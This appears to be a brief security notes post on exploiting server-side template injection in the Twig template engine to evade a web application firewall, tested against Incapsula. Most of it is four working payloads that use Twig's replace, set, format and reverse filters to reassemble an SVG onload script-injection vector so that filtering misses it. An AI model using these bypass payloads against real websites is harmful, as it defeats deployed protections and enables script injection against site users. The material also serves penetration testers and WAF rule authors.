Bypassing WAF exploiting SSTI - Twig
TLDR : SSTI in Twig can be exploited to bypass WAF.
Twig allows multiple string iteration attributes which can be very helpful while deceiving Web Application Firewall
Tested WAF : Incapsula
Bypass #1 : replace
attribute
Payload :
{%set a="<svg oYad=aZt`1`>"%}
{{a|replace({'Y':'nlo','Z':'ler'})|raw}}
Bypass #2 : set
attribute to define variables and then concatinating them
{%set a='<svg o'%}
{%set b='nload=al'%}
{%set c='ert`1`>'%}
{{a|raw}}{{b|raw}}{{c|raw}}
raw
attribute prevents the string from being encoded
Bypass #3 : format
attribute works pretty much like printf
{{'<sv%snload=%s%s>'|format('g o','aler','t`1`')|raw}}
Bypass #4 : :reverse
attribute
{{'>)1(trela=daolno gvs<'|reverse|raw}}
Link : TwigFiddle